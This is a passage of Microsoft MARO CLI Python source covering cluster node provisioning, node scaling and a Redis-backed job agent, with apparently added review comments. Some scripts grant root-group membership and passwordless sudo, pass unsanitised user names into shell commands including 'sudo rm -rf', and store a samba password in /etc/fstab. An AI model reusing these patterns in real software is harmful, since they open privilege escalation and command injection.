return completed_process.stderr
return completed_process.stdout
def create_user(user_name: str) -> None:
    """Create the user, add it to the root group, and prepare its ~/.ssh directory.

    Prints a message and exits the process with status 1 on failure.

    Fix vs. original: the bare `except:` (which also swallowed SystemExit and
    KeyboardInterrupt) is narrowed to OSError — run_command reports command
    failures via its return value, so only the filesystem calls can raise here.
    """
    try:
        run_command("sudo useradd -m " + user_name)
        # NOTE(review): `usermod -G` REPLACES the supplementary group list; for a
        # freshly created user this sets it to just 'root', but `-aG` would be the
        # safer append form — confirm intent before changing.
        run_command("sudo usermod -G root " + user_name)
        ssh_path = f"/home/{user_name}/.ssh/"
        if not os.path.exists(ssh_path):
            os.mkdir(ssh_path)
    except OSError:
        print("Failed to add user.")
        sys.exit(1)
def add_pub_key(user_name: str, pub_key: str) -> None:
    """Write the given public key into the user's authorized_keys file.

    Fix vs. original: the explicit close() inside the with-block was dead code —
    the context manager already closes the file.
    """
    ssh_path = f"/home/{user_name}/.ssh/"
    authorized_keys_path = os.path.join(ssh_path, "authorized_keys")
    # "w+" truncates: any previously authorized keys are replaced.
    with open(authorized_keys_path, "w+") as pub_key_file:
        lines = ["\r\n", pub_key, "\r\n"]
        pub_key_file.writelines(lines)
# Please don't test on your own macOS or Linux.
# Sudoers file doesn't accept "\r\n", but only "\r" seems OK.
def add_sudoers(user_name: str) -> None:
    """Append a passwordless-sudo rule for the user to /etc/sudoers.

    Fix vs. original: the explicit close() inside the with-block was dead code.
    """
    account_line = f"{user_name} ALL=(ALL:ALL) NOPASSWD:ALL"
    # NOTE(review): no leading newline is written; if /etc/sudoers does not end
    # with a newline, this rule is appended onto the previous line — verify.
    with open("/etc/sudoers", "a+") as sudoers_file:
        lines = [account_line]
        sudoers_file.writelines(lines)
def check_sudoers(user_name: str) -> bool:
    """Return True when the user's passwordless-sudo rule is already in /etc/sudoers.

    Fix vs. original: removed the dead close() inside the with-block and replaced
    the manual scan loop with any(); the per-line substring match is unchanged.
    """
    account_line = f"{user_name} ALL=(ALL:ALL) NOPASSWD:ALL"
    with open("/etc/sudoers", "r") as sudoers_file:
        return any(account_line in line for line in sudoers_file)
def user_already_exists(user_name: str) -> bool:
    """Return True when the user's home directory already exists."""
    return os.path.exists("/home/" + user_name)
if __name__ == "__main__":
    # Load args: account name and the RSA public key to authorize.
    parser = argparse.ArgumentParser()
    parser.add_argument("user_name")
    parser.add_argument("pub_key")
    args = parser.parse_args()
    if not user_already_exists(args.user_name):
        # create user and generate its own SSH keypair (no passphrase)
        create_user(args.user_name)
        user_path = "/home/" + args.user_name
        run_command(f"sudo ssh-keygen -t rsa -N '' -f {user_path}/.ssh/id_rsa")
    if not check_sudoers(args.user_name):
        add_sudoers(args.user_name)
    # set pub key — note this overwrites authorized_keys even for an existing user
    add_pub_key(args.user_name, args.pub_key)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import argparse
import crypt
import getpass
import os
import subprocess
import sys
import platform
"""
This file is used for deleting a specified account and related files on node.
Example:
sudo python3 delete_user.py {account name}
"""
def run_command(command: str) -> str:
if platform.system() == "Windows":
command = f"powershell.exe -Command \"{command}\""
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if completed_process.returncode != 0:
return completed_process.stderr
return completed_process.stdout
def delete_user(user_name: str):
    """Remove the user account and its home directory; exit(1) on failure.

    Fix vs. original: the bare `except:` (which also swallowed SystemExit and
    KeyboardInterrupt) is narrowed to OSError — run_command reports command
    failures via its return value, so only the filesystem check can raise here.
    """
    try:
        user_path = "/home/" + user_name
        run_command("sudo userdel -f " + user_name)
        if os.path.exists(user_path):
            run_command("sudo rm -rf " + user_path)
    except OSError:
        print("Failed to delete user.")
        sys.exit(1)
def user_already_exists(user_name: str) -> bool:
    """Return True when the user's home directory already exists."""
    return os.path.exists("/home/" + user_name)
if __name__ == "__main__":
    # Parse the account name from the command line.
    parser = argparse.ArgumentParser()
    parser.add_argument("user_name")
    args = parser.parse_args()
    if user_already_exists(args.user_name):
        # Delete the account and its home directory, then report.
        delete_user(args.user_name)
        print(f"The account {args.user_name} has been deleted.")
    else:
        # Fix vs. original: grammar in the user-facing message
        # ("does not exists" -> "does not exist").
        print(f"The account {args.user_name} does not exist.")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import subprocess
import sys
INIT_COMMAND = """\
echo 'Step 1/{steps}: Install nvidia driver'
sudo apt-get install linux-headers-$(uname -r)
distribution=$(. /etc/os-release;echo $ID$VERSION_ID | tr -d '.')
wget https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/cuda-$distribution.pin
sudo mv cuda-$distribution.pin /etc/apt/preferences.d/cuda-repository-pin-600
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/7fa2af80.pub
echo "deb http://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64 /" | \
sudo tee /etc/apt/sources.list.d/cuda.list
sudo apt-get update
sudo apt-get -y install cuda-drivers
echo 'Step 2/{steps}: Install docker'
sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo apt-key fingerprint 0EBFCD88
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
sudo apt-get update
sudo apt-get install -y docker-ce docker-ce-cli containerd.io
echo 'Step 3/{steps}: Install nvidia container toolkit'
distribution=$(. /etc/os-release;echo $ID$VERSION_ID) \
&& curl -s -L https://nvidia.github.io/nvidia-docker/gpgkey | sudo apt-key add - \
&& curl -s -L https://nvidia.github.io/nvidia-docker/$distribution/nvidia-docker.list | \
sudo tee /etc/apt/sources.list.d/nvidia-docker.list
sudo apt-get update
sudo apt-get install -y nvidia-docker2
sudo systemctl restart docker
echo 'Step 4/{steps}: Install python3 and related packages'
sudo apt update
sudo apt install -y python3-pip
pip3 install redis
echo 'Step 5/{steps}: Delete outdated files'
rm ~/init_build_node_image_vm.py
"""
if __name__ == "__main__":
    # Exec command: run the provisioning script under bash, streaming stdout live.
    command = INIT_COMMAND.format(steps=5)
    process = subprocess.Popen(
        command,
        executable="/bin/bash",
        shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
    )
    # Echo each stdout line as it arrives until the child exits.
    while True:
        nextline = process.stdout.readline()
        if nextline == "" and process.poll() is not None:
            break
        sys.stdout.write(nextline)
        sys.stdout.flush()
    # NOTE(review): stderr is only drained here, after stdout EOF; a very chatty
    # stderr could fill its pipe and stall the child — confirm acceptable.
    stdout, stderr = process.communicate()
    if stderr:
        sys.stderr.write(stderr.strip("\n"))
    sys.stdout.write(stdout.strip("\n"))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import argparse
import os
import subprocess
import sys
import yaml
# Shell script template run on a new node when it joins the cluster: docker
# group setup, samba mount of the master share, master SSH key authorization,
# then self-cleanup. Placeholders are substituted via str.format at run time.
INIT_COMMAND = '''\
# create group 'docker' and add admin user
sudo groupadd docker
sudo gpasswd -a {admin_username} docker
# setup samba mount
echo 'Step 1/{steps}: Setup samba mount'
mkdir -p {maro_path}
sudo mount -t cifs -o username={admin_username},password={samba_password} //{master_hostname}/sambashare {maro_path}
echo '//{master_hostname}/sambashare {maro_path} cifs username={admin_username},password={samba_password} 0 0' | \
sudo tee -a /etc/fstab
# load master public key
echo 'Step 2/{steps}: Load master public key'
echo '{master_public_key}' >> ~/.ssh/authorized_keys
# delete outdated files
echo 'Step 3/{steps}: Delete outdated files'
rm ~/details.yml
rm ~/init_node.py
echo "Finish node initialization"
'''
if __name__ == "__main__":
    # Load args
    parser = argparse.ArgumentParser()
    parser.add_argument("cluster_name")
    parser.add_argument("node_name")
    args = parser.parse_args()
    # NOTE(review): args are parsed but never read below — all values come from
    # ~/details.yml; confirm whether the positional args are validation-only.
    # Load details from the cluster file dropped on this node.
    with open(os.path.expanduser("~/details.yml"), "r") as fr:
        cluster_details = yaml.safe_load(fr)
    master_hostname = cluster_details["master"]["hostname"]
    master_public_key = cluster_details["master"]["public_key"]
    admin_username = cluster_details["user"]["admin_username"]
    samba_password = cluster_details["master"]["samba"]["password"]
    # Load command: fill the init-script template.
    command = INIT_COMMAND.format(
        admin_username=admin_username,
        maro_path=os.path.expanduser("~/.maro"),
        samba_password=samba_password,
        master_hostname=master_hostname,
        master_public_key=master_public_key,
        steps=3
    )
    # Exec command under bash, streaming stdout live.
    process = subprocess.Popen(
        command,
        executable="/bin/bash",
        shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
    )
    while True:
        nextline = process.stdout.readline()
        if nextline == "" and process.poll() is not None:
            break
        sys.stdout.write(nextline)
        sys.stdout.flush()
    # NOTE(review): stderr is only drained here, after stdout EOF; a very chatty
    # stderr could fill its pipe and stall the child — confirm acceptable.
    stdout, stderr = process.communicate()
    if stderr:
        sys.stderr.write(stderr.strip("\n"))
    sys.stdout.write(stdout.strip("\n"))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import yaml
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.grass.executors.grass_on_premises_executor import GrassOnPremisesExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError, FileOperationError
@check_details_validity
@lock
def scale_node(cluster_name: str, replicas: int, node_size: str, **kwargs):
    """Scale the cluster's nodes of `node_size` to `replicas` instances (grass/azure only)."""
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    mode = cluster_details["mode"]
    if mode != "grass/azure":
        raise BadRequestError(f"Unsupported command in mode '{mode}'.")
    GrassAzureExecutor(cluster_name=cluster_name).scale_node(replicas=replicas, node_size=node_size)
@check_details_validity
@lock
def start_node(cluster_name: str, replicas: int, node_size: str, **kwargs):
    """Start `replicas` stopped nodes of `node_size` (grass/azure only)."""
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    mode = cluster_details["mode"]
    if mode != "grass/azure":
        raise BadRequestError(f"Unsupported command in mode '{mode}'.")
    GrassAzureExecutor(cluster_name=cluster_name).start_node(replicas=replicas, node_size=node_size)
@check_details_validity
@lock
def stop_node(cluster_name: str, replicas: int, node_size: str, **kwargs):
    """Stop `replicas` running nodes of `node_size` (grass/azure only)."""
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    mode = cluster_details["mode"]
    if mode != "grass/azure":
        raise BadRequestError(f"Unsupported command in mode '{mode}'.")
    GrassAzureExecutor(cluster_name=cluster_name).stop_node(replicas=replicas, node_size=node_size)
@check_details_validity
@lock
def list_node(cluster_name: str, **kwargs):
    """List the nodes of a grass cluster.

    Fix vs. original: an unsupported mode now raises BadRequestError like the
    sibling commands instead of silently doing nothing.
    """
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    if cluster_details["mode"] in ["grass/azure", "grass/on-premises"]:
        # NOTE(review): GrassAzureExecutor serves both modes here; confirm
        # whether grass/on-premises should use GrassOnPremisesExecutor instead.
        executor = GrassAzureExecutor(cluster_name=cluster_name)
        executor.list_node()
    else:
        raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
def node_join(node_join_path: str, **kwargs):
    """Join a node to a grass/on-premises cluster using a node-join template file.

    Fix vs. original: removed the redundant fr.close() inside the with-block
    (the context manager already closes the file).

    Raises:
        BadRequestError: If the template's mode is not grass/on-premises.
        FileOperationError: If the template file cannot be found.
    """
    try:
        with open(node_join_path, "r") as fr:
            node_join_info = yaml.safe_load(fr)
        if node_join_info["mode"] != "grass/on-premises":
            raise BadRequestError(
                f"Node join cluster interrupted: Invalid mode: {node_join_info['mode']}")
        executor = GrassOnPremisesExecutor(node_join_info["cluster"])
        executor.node_join_cluster(node_join_info)
    except FileNotFoundError:
        raise FileOperationError("Invalid template file path.")
@check_details_validity
@lock
def node_leave(cluster_name: str, node_name: str, **kwargs):
    """Detach a node from a grass/on-premises cluster."""
    details = load_cluster_details(cluster_name)
    if details["mode"] != "grass/on-premises":
        raise BadRequestError("Node join cluster interrupted: Invalid mode.")
    GrassOnPremisesExecutor(cluster_name).node_leave_cluster(node_name)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.cli.k8s.executors.k8s_aks_executor import K8sAksExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError
@check_details_validity
@lock
def scale_node(cluster_name: str, replicas: int, node_size: str, **kwargs):
    """Scale the AKS cluster's node pool of `node_size` to `replicas` (k8s/aks only)."""
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    mode = cluster_details["mode"]
    if mode != "k8s/aks":
        raise BadRequestError(f"Unsupported command in mode '{mode}'.")
    executor = K8sAksExecutor(cluster_name=cluster_name)
    executor.scale_node(replicas=replicas, node_size=node_size)
@check_details_validity
@lock
def list_node(cluster_name: str, **kwargs):
    """List the nodes of an AKS cluster (k8s/aks only)."""
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    mode = cluster_details["mode"]
    if mode != "k8s/aks":
        raise BadRequestError(f"Unsupported command in mode '{mode}'.")
    K8sAksExecutor(cluster_name=cluster_name).list_node()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import multiprocessing as mp
import os
import subprocess
import time
import psutil
import redis
from maro.cli.process.utils.details import close_by_pid, get_child_pid, load_setting_info
from maro.cli.utils.params import LocalPaths, ProcessRedisName
class PendingJobAgent(mp.Process):
    """Background process that starts queued jobs when the parallel level allows it."""

    def __init__(self, redis_connection, check_interval: int = 60):
        super().__init__()
        self.redis_connection = redis_connection
        self.check_interval = check_interval

    def run(self):
        """Poll the pending-job queue forever, sleeping `check_interval` seconds between rounds."""
        while True:
            self._check_pending_ticket()
            time.sleep(self.check_interval)

    def _check_pending_ticket(self):
        # Check pending job ticket
        pending_jobs = self.redis_connection.lrange(ProcessRedisName.PENDING_JOB_TICKETS, 0, -1)
        for job_name in pending_jobs:
            job_detail = json.loads(self.redis_connection.hget(ProcessRedisName.JOB_DETAILS, job_name))
            # Re-read capacity on every iteration since each start changes it.
            running_jobs_length = self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB)
            parallel_level = self.redis_connection.hget(ProcessRedisName.SETTING, "parallel_level")
            # Start pending job only if current running job's number less than parallel level.
            # Jobs over the limit stay in the queue for the next polling round.
            if int(parallel_level) > running_jobs_length:
                self._start_job(job_detail)
                self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)

    def _start_job(self, job_details: dict):
        """Spawn every component replica of the job and record their pids in Redis."""
        command_pid_list = []
        for component_type, command_info in job_details["components"].items():
            component_number = command_info["num"]
            # The job name is exported to the component via the environment.
            component_command = f"JOB_NAME={job_details['name']} " + command_info["command"]
            for number in range(component_number):
                job_local_path = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_details['name']}")
                if not os.path.exists(job_local_path):
                    os.makedirs(job_local_path)
                # Each replica logs into its own file under the job folder.
                with open(f"{job_local_path}/{component_type}_{number}.log", "w") as log_file:
                    proc = subprocess.Popen(component_command, shell=True, stdout=log_file)
                    # NOTE(review): get_child_pid presumably resolves the shell's
                    # child pid so the real worker can be tracked — confirm.
                    command_pid = get_child_pid(proc.pid)
                    command_pid_list.append(command_pid)
        self.redis_connection.hset(ProcessRedisName.RUNNING_JOB, job_details["name"], json.dumps(command_pid_list))
class JobTrackingAgent(mp.Process):
    """Background process that prunes finished jobs and can shut the agents down when idle."""

    def __init__(self, redis_connection, check_interval: int = 60):
        super().__init__()
        self.redis_connection = redis_connection
        self.check_interval = check_interval
        self._shutdown_count = 0
        # Fix vs. original: this connection is created without decode_responses,
        # so hget returns bytes; cast once so the `>=` comparison in
        # _close_agents does not raise TypeError (int vs bytes).
        self._countdown = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_countdown"))

    def run(self):
        """Poll job status forever; when keep_agent_alive is 0, allow self-shutdown."""
        while True:
            self._check_job_status()
            time.sleep(self.check_interval)
            keep_alive = int(self.redis_connection.hget(ProcessRedisName.SETTING, "keep_agent_alive"))
            if not keep_alive:
                self._close_agents()

    def _check_job_status(self):
        """Remove running-job records whose component processes have all exited."""
        running_jobs = self.redis_connection.hgetall(ProcessRedisName.RUNNING_JOB)
        # Keys come back as bytes from this connection; pid lists are JSON.
        running_jobs = {job_name.decode(): json.loads(pid_list) for job_name, pid_list in running_jobs.items()}
        for running_job, pid_list in running_jobs.items():
            # A job is considered alive while any of its pids still exists.
            still_alive = False
            for pid in pid_list:
                if psutil.pid_exists(pid):
                    still_alive = True
            if not still_alive:
                self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, running_job)

    def _close_agents(self):
        """After `_countdown` consecutive idle checks, stop the whole agent process tree."""
        if (
            not self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB) and
            not self.redis_connection.llen(ProcessRedisName.PENDING_JOB_TICKETS)
        ):
            self._shutdown_count += 1
        else:
            # Any activity resets the idle streak.
            self._shutdown_count = 0
        if self._shutdown_count >= self._countdown:
            agent_pid = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_pid"))
            # close agent (and children, which includes this process)
            close_by_pid(pid=agent_pid, recursive=True)
            # Set agent status to 0
            self.redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 0)
class KilledJobAgent(mp.Process):
    """Background process that consumes kill tickets and terminates the matching jobs.

    Args:
        redis_connection: Redis client used for job bookkeeping.
        check_interval (int): Seconds to sleep between checks. Defaults to 60.
    """

    def __init__(self, redis_connection, check_interval: int = 60):
        super().__init__()
        self.redis_connection = redis_connection
        self.check_interval = check_interval

    def run(self):
        """Poll the kill-ticket list forever at the configured interval."""
        while True:
            self._check_kill_ticket()
            time.sleep(self.check_interval)

    def _check_kill_ticket(self):
        """Process each kill ticket, then remove the ticket itself."""
        for ticket in self.redis_connection.lrange(ProcessRedisName.KILLED_JOB_TICKETS, 0, -1):
            if self.redis_connection.hexists(ProcessRedisName.RUNNING_JOB, ticket):
                # Running job: kill its recorded component pids and drop the running record.
                pids = json.loads(self.redis_connection.hget(ProcessRedisName.RUNNING_JOB, ticket))
                close_by_pid(pid=pids, recursive=False)
                self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, ticket)
            else:
                # Not started yet: drop it from the pending queue instead.
                self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, ticket)

            self.redis_connection.lrem(ProcessRedisName.KILLED_JOB_TICKETS, 0, ticket)
class MasterAgent:
    """Entry point that boots the three cooperating agents for MARO process mode."""

    def __init__(self):
        setting_info = load_setting_info()
        self.check_interval = setting_info["check_interval"]
        self.redis_connection = redis.Redis(
            host=setting_info["redis_info"]["host"],
            port=setting_info["redis_info"]["port"]
        )
        # Record this process's pid so other components can locate and stop the agents.
        self.redis_connection.hset(ProcessRedisName.SETTING, "agent_pid", os.getpid())

    def start(self) -> None:
        """Start agents."""
        # Launch one instance of each agent type, all sharing the same connection/interval.
        for agent_cls in (PendingJobAgent, KilledJobAgent, JobTrackingAgent):
            agent = agent_cls(
                redis_connection=self.redis_connection,
                check_interval=self.check_interval
            )
            agent.start()
# Script entry point: create the master agent and spawn the job-management agents.
if __name__ == "__main__":
    master_agent = MasterAgent()
    master_agent.start()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import redis
from maro.cli.process.utils.default_param import process_setting
from maro.cli.process.utils.details import load_details, save_setting_info, start_agent, start_redis
from maro.cli.utils.params import LocalPaths, ProcessRedisName
from maro.utils.logger import CliLogger
logger = CliLogger(name=f"ProcessExecutor.{__name__}")
def create(deployment_path: str, **kwargs):
    """Set up MARO process mode: local folder, setting file, Redis server and agents.

    Args:
        deployment_path (str): Path of a yaml file with customized settings, or None to
            use the defaults from ``process_setting`` unchanged.
        **kwargs: Unused; kept for CLI-dispatch compatibility.
    """
    current_process_path = os.path.expanduser(LocalPaths.MARO_PROCESS)

    # Create folder
    if not os.path.exists(current_process_path):
        os.makedirs(current_process_path)

    # Get environment setting. Bug fix: copy the module-level default first — the original
    # mutated (and later deleted "redis_info" from) the shared ``process_setting`` dict itself.
    # Only top-level keys are mutated below, so a shallow copy is sufficient.
    setting_info = dict(process_setting)
    if deployment_path is not None:
        customized_setting = load_details(deployment_path=deployment_path)
        for key, value in customized_setting.items():
            # Only known setting keys may be overridden; unknown keys are ignored.
            if key in setting_info:
                setting_info[key] = value

    save_setting_info(setting_info)
    logger.info(f"MARO process mode setting: {setting_info}")

    # Start Redis only when MARO manages it itself.
    if setting_info["redis_mode"] == "MARO":
        start_redis(port=setting_info["redis_info"]["port"])
        logger.info(f"Redis server start with port {setting_info['redis_info']['port']}.")

    redis_connection = redis.Redis(host=setting_info["redis_info"]["host"], port=setting_info["redis_info"]["port"])

    # Start agents
    start_agent()
    redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 1)
    logger.info("Agents start.")

    # Push default setting into Redis; redis_info is connection info, not a stored setting.
    del setting_info["redis_info"]
    redis_connection.hmset(ProcessRedisName.SETTING, setting_info)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import os
import subprocess
import redis
from maro.cli.process.utils.details import close_by_pid, load_setting_info
from maro.cli.utils.params import LocalPaths, ProcessRedisName
from maro.utils.logger import CliLogger
logger = CliLogger(name=f"ProcessExecutor.{__name__}")
def delete(**kwargs):
    """Tear down MARO process mode: stop jobs, agents, the MARO-managed Redis and settings.

    Args:
        **kwargs: Unused; kept for CLI-dispatch compatibility.
    """
    setting_info = load_setting_info()

    # Build connection
    redis_connection = redis.Redis(host=setting_info["redis_info"]["host"], port=setting_info["redis_info"]["port"])

    # Stop running jobs
    running_jobs = redis_connection.hgetall(ProcessRedisName.RUNNING_JOB)
    if running_jobs:
        for job_name, pid_list in running_jobs.items():
            pid_list = json.loads(pid_list)
            close_by_pid(pid=pid_list, recursive=False)
            logger.info(f"Stop running job {job_name.decode()}.")

    # Stop Agents
    agent_status = int(redis_connection.hget(ProcessRedisName.SETTING, "agent_status"))
    if agent_status:
        agent_pid = int(redis_connection.hget(ProcessRedisName.SETTING, "agent_pid"))
        close_by_pid(pid=agent_pid, recursive=True)
        redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 0)
        logger.info("Close agents.")
    else:
        logger.info("Agents' status is already closed.")

    # Close Redis, but only when MARO started it itself.
    redis_mode = redis_connection.hget(ProcessRedisName.SETTING, "redis_mode").decode()
    if redis_mode == "MARO":
        get_redis_pid_command = f"pidof 'redis-server *:{setting_info['redis_info']['port']}'"
        get_redis_pid_process = subprocess.Popen(get_redis_pid_command, shell=True, stdout=subprocess.PIPE)
        pidof_output = get_redis_pid_process.stdout.read()
        get_redis_pid_process.wait()
        # Robustness fix: pidof may print nothing (server already gone) or several pids;
        # the original ``int(...)`` call crashed with ValueError in both cases.
        redis_pids = [int(token) for token in pidof_output.split()]
        if redis_pids:
            close_by_pid(pid=redis_pids, recursive=False)
            logger.info(f"Close Redis server with port {setting_info['redis_info']['port']}")
        else:
            logger.info(f"No Redis server found with port {setting_info['redis_info']['port']}.")
    else:
        logger.info(f"MARO does not close Redis server with mode {redis_mode}.")

    # Rm process environment setting
    os.remove(os.path.expanduser(LocalPaths.MARO_PROCESS_SETTING))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import copy
import json
import os
import shutil
from maro.cli.process.utils.details import env_prepare, load_details
from maro.cli.utils.params import LocalPaths, ProcessRedisName
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class ProcessExecutor:
    """Executor for maro process mode: submits, stops, deletes and inspects local jobs via Redis."""

    def __init__(self):
        # env_prepare() ensures Redis is reachable and the agents are running.
        self.redis_connection = env_prepare()

    def start_job(self, deployment_path: str):
        """Load a job deployment yaml and queue the job for execution."""
        job_details = load_details(deployment_path)
        self._push_pending_job(job_details)

    def _push_pending_job(self, job_details: dict):
        """Record the job's details and push its name onto the pending-ticket list."""
        job_name = job_details["name"]
        # Push job details to redis
        self.redis_connection.hset(
            ProcessRedisName.JOB_DETAILS,
            job_name,
            json.dumps(job_details)
        )

        # Push job name to pending_job_tickets
        self.redis_connection.lpush(
            ProcessRedisName.PENDING_JOB_TICKETS,
            job_name
        )
        logger.info(f"Sending {job_name} into pending job tickets.")

    def stop_job(self, job_name: str):
        """Issue a kill ticket for ``job_name``; logs an error and returns for unknown jobs."""
        if not self.redis_connection.hexists(ProcessRedisName.JOB_DETAILS, job_name):
            logger.error(f"No such job '{job_name}' in Redis.")
            return

        # push job_name into kill_job_tickets
        self.redis_connection.lpush(
            ProcessRedisName.KILLED_JOB_TICKETS,
            job_name
        )
        logger.info(f"Sending {job_name} into killed job tickets.")

    def delete_job(self, job_name: str):
        """Stop a job and remove both its Redis record and its local log folder."""
        # Stop job for running and pending job.
        self.stop_job(job_name)

        # Rm job details in Redis
        self.redis_connection.hdel(ProcessRedisName.JOB_DETAILS, job_name)

        # Rm job's log folder; ignore_errors=True tolerates an already-missing folder.
        job_folder = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_name}")
        shutil.rmtree(job_folder, True)
        logger.info(f"Remove local temporary log folder {job_folder}.")

    def get_job_logs(self, job_name):
        """Copy the job's log folder into the current working directory."""
        source_path = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_name}")
        if not os.path.exists(source_path):
            logger.error(f"Cannot find the logs of {job_name}.")
            # Bug fix: the original fell through and crashed in copytree on the missing source.
            return

        destination = os.path.join(os.getcwd(), job_name)
        if os.path.exists(destination):
            shutil.rmtree(destination)

        shutil.copytree(source_path, destination)
        logger.info(f"Dump logs in path: {destination}.")

    def list_job(self):
        """Log every known job's details, annotated with a running/pending/finish status."""
        # Get all jobs
        jobs = self.redis_connection.hgetall(ProcessRedisName.JOB_DETAILS)
        for job_name, job_details in jobs.items():
            job_name = job_name.decode()
            job_details = json.loads(job_details)
            if self.redis_connection.hexists(ProcessRedisName.RUNNING_JOB, job_name):
                job_details["job_status"] = "running"
            else:
                pending_jobs = self.redis_connection.lrange(ProcessRedisName.PENDING_JOB_TICKETS, 0, -1)
                pending_jobs = [pending.decode() for pending in pending_jobs]
                job_details["job_status"] = "pending" if job_name in pending_jobs else "finish"

            logger.info(job_details)

    def start_schedule(self, deployment_path: str):
        """Load a schedule yaml and queue each of its member jobs."""
        schedule_detail = load_details(deployment_path)

        # push schedule details to Redis
        self.redis_connection.hset(
            ProcessRedisName.JOB_DETAILS,
            schedule_detail["name"],
            json.dumps(schedule_detail)
        )

        job_list = schedule_detail["job_names"]
        # switch schedule details into job details
        job_detail = copy.deepcopy(schedule_detail)
        del job_detail["job_names"]

        for job_name in job_list:
            job_detail["name"] = job_name
            self._push_pending_job(job_detail)

    def stop_schedule(self, schedule_name: str):
        """Issue kill tickets for every job belonging to the schedule."""
        if self.redis_connection.hexists(ProcessRedisName.JOB_DETAILS, schedule_name):
            schedule_details = json.loads(self.redis_connection.hget(ProcessRedisName.JOB_DETAILS, schedule_name))
        else:
            logger.error(f"Cannot find {schedule_name} in Redis. Please check schedule name.")
            return

        job_list = schedule_details["job_names"]
        for job_name in job_list:
            self.stop_job(job_name)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import signal
import subprocess
from typing import Union
import psutil
import redis
import yaml
from maro.cli.utils.params import LocalPaths, ProcessRedisName
from maro.utils.exception.cli_exception import ProcessInternalError
def load_details(deployment_path: str = None):
    """Load a yaml deployment file and return its parsed content.

    Args:
        deployment_path (str): Path of the yaml file to read.

    Returns:
        Parsed deployment details (as produced by ``yaml.safe_load``).

    Raises:
        ProcessInternalError: If the file cannot be read or parsed.
    """
    try:
        with open(deployment_path, "r") as cf:
            details = yaml.safe_load(cf)
    except Exception as e:
        # Fix error-message typo ("cause by") and chain the original exception for debugging.
        raise ProcessInternalError(f"Failure to find job details, caused by {e}") from e

    return details
def load_setting_info():
    """Load the saved process-mode setting yaml (written by ``save_setting_info``).

    Returns:
        Setting information, including the ``redis_info`` connection details.

    Raises:
        ProcessInternalError: If the setting file is missing or unreadable.
    """
    try:
        with open(os.path.expanduser(LocalPaths.MARO_PROCESS_SETTING), "r") as rf:
            setting_info = yaml.safe_load(rf)
    except Exception as e:
        # Fix: the original implicit f-string concatenation produced
        # "...cause by <err>Please run..." with no separator between the sentences.
        raise ProcessInternalError(
            f"Failure to load setting information, caused by {e}. "
            f"Please run maro process setup, before any process commands."
        ) from e

    return setting_info
def save_setting_info(setting_info):
    """Persist the process-mode settings to the well-known setting yaml location."""
    setting_path = os.path.expanduser(LocalPaths.MARO_PROCESS_SETTING)
    with open(setting_path, "w") as setting_file:
        yaml.safe_dump(setting_info, setting_file)
def env_prepare():
    """Need Redis ready and master agent start."""
    setting_info = load_setting_info()
    redis_info = setting_info["redis_info"]
    connection = redis.Redis(host=redis_info["host"], port=redis_info["port"])

    # Relaunch the agents if they were previously shut down.
    if not int(connection.hget(ProcessRedisName.SETTING, "agent_status")):
        start_agent()
        connection.hset(ProcessRedisName.SETTING, "agent_status", 1)

    return connection
def start_agent():
    """Launch the master job agent (job_agent.py) as a detached shell process."""
    subprocess.Popen(f"python {LocalPaths.MARO_PROCESS_AGENT}", shell=True)
def start_redis(port: int):
    """Start a daemonized Redis server for MARO on the given port."""
    launcher = subprocess.Popen(
